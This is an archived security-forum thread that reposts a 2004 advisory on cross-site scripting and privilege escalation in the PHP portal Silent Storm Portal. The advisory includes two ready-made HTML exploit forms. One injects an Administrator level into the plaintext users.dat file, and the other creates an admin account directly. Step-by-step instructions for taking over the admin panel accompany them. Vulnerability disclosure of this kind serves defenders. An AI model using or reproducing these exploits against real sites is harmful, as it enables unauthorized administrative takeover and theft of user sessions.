Articles

Metasploit Framework Windows Tutorial
Remote Desktop Connection
Windows Processes That May Be Dangerous
How-To use NetCat a Tutorial
Common Linux Commands
Common Ports
Netcat Commands
HTTP Response Codes
War-Google Hack Terms
Wardriving
Avoiding Social Engineering and Phishing Attacks
Intrusion Detection on Linux
Linux Intrusion Detection
Penetration Testing Guide
Penetration Testing Tools
Social Engineering Fundamentals, Part I: Hacker Tactics
Social engineering (computer security)
The Psychology of Social Engineering

The Archives

General GSO
GovernmentSecurity.org News & Suggestions
In The News
Open Topic
General Security Information
Trash Can
Exploit & Vulnerability Mailing List Archives
Trial Member Forum
Product and Program Reviews GSO Tutorials
System Security
Windows Systems
Beginners Section
Linux & Unix Systems
File Downloads
Exploit Research & Discussion Trojan & Virus Errata
Networking Security / Firewall / IDS / VPN / Routers
System Hardening
E-Mail Security
Wifi Security
Trial Member Uploads
Upload discovered Trojans & Mal ware
GSO Programming Section
C , C++ , VC++
Visual Basic.NET
Perl /CGI
Java/Javascript
PHP/XML/ASP/HTML
Assembly + Other
The Cork Board
Network Security Consultant Directory
Network Security Jobs
The Archives
Encryption Information
General Network Security
Internet Anonymity
HTTP Protocol Security
Linux Security
MS IIS Information
Exploit Articles
Programming / Tool Design
GSO Software Projects
Public Downloads
Microsoft Security Questions and Papers
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
qcred11
Sep 30 2004, 06:07 PM
QUOTE

#####################################

Software:
Silent Storm Portal

Web Site:
http://www.silent-storm.co.uk/ssp/

Affected Version(s):
2.1,2.2

Description:
Silent Storm Portal is a PHP based portal system.It requires PHP4 or above.no MySQL needed.

Multiple Vulnerabilities in Silent Storm Portal:

Cross-Site Scripting vulnerability :

Silent Storm Portal is prone to cross-site scripting attacks. It is possible to construct a link containing arbitrary script code to a website running Silent Storm Portal . When a user browses the link, the script code will be executed on the user in the context of the site using the Portal.The impact of this issue is that the attacker is able to hijack a legitimate web user's session, by stealing cookie-based authentication credentials.

Demonstration:

http://www.victim.com/index.php?module=%3C...9;%3C/script%3E


Unauthorized Administrative Access Vulnerability :

Silent Storm Portal stores all account informations,usernames and passwords in the users.dat file.This file is a plaintext file stored in the db directory.There is a flaw in profile.php file which could allow normal members to gain escalated privileges.The issue occurs due to insufficient sanitization of user-supplied data that may allow escape character sequences to be injected into the users.dat file.Submitting an e-mail address with an evil level code via profile module will inject Administrator level value into the database file and will escalate the current level to Administrator privileges.

Demonstration:

Register a user account then login and run the exploit.html

---exploit.html----
<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any_at_mail.com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>
---/exploit.html---

That's All!
What Happened?
The 3rd line of exploit.html injected Administrator level "1" into the database file.
( 1: Administrator,2: is Normal User. )

examples from the database file:

before exploiting:

evilaccount<~>password<~>any_at_mail.com<~>2<~><~><~><~><~>
                                      Level
                                  Normal User
after exploiting:

evilaccount<~>password<~>any_at_mail.com<~>1<~><~>2<~><~><~><~><~><~><~>
                                Injected Level
                                  Administrator

You'll get "Updated Your Profile Sucessfuly !" message after executing the exploit.html
That's All! logout and re-login with your username/password.
click to "Admin Panel" link. ( index.php?module=../../apanel )
Now you have full Administrator privileges.

Here is another code that creates an Administrator account directly on the victim's portal:

---exploit2.html----
<form method="post" action="http://www.victim.com/index.php?module=../../Home">
User:<input type="text" name="usr" size="10"><br>
Pass:<input type="password" name="pas" size="10"><br>
<input type=hidden name="ema" value="any_at_mail.com<~>1<~>"><br>
<input type="submit" name="reg" value="Create Admin!">
</form>
---/exploit2.html---

----------------------------


Source: http://seclists.org/lists/bugtraq/2004/Sep/0456.html
Kynroxes
Oct 1 2004, 05:08 AM
humm tks to this advisory qcred11
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2005 Invision Power Services, Inc.